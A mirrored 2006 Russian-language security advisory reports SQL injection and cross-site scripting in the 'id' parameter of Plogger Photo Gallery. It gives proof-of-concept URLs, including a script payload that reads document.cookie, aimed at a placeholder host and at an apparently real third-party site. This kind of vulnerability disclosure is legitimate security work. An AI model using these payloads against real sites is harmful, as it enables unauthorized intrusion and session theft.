Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:10942
HistoryJan 10, 2006 - 12:00 a.m.

Sql-инъекция и межсайтовый скриптинг в Plogger Photo Gallery

2006-01-1000:00:00
vulners.com
27
JSON

Здравствуйте, 3APA3A.

свежая порция:
Software: Plogger Photo Gallery > = 2.1
Vendor: Plogger www.plogger.org
Vulnerability: Sql-инъекция и межсайтовый скриптинг
Risk: средний
Date: 10.01.2006
discovered by durito -durito[at]mail[dot]ru-
HTTP: all-about-all.net
durito.narod.ru

+~~~:| Details |:

Уязвимость существует из-за недостаточной обработки входных данных в параметре "id" . Удаленный пользователь может с помощью специально сформированного запроса выполнить Sql-инъекция и произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
Межсайтовый скриптинг:
http://www.xxx.com/gallery/index.php?level=album&id=%3Cscript%3Ealert(document.cookie);%3C/script%3E

Sql-инъекция:
http://www.xxx.com/gallery/index.php?level=album&id='1

Примеры:

http://www.mahyuni.com/gallery/index.php?level=album&id='1
http://www.mahyuni.com/gallery/index.php?level=album&id=%3Cscript%3Ealert(document.cookie);%3C/script%3E


С уважением,
durito [LwB Security Team] mailto:[email protected]
http://durito.narod.ru

JSON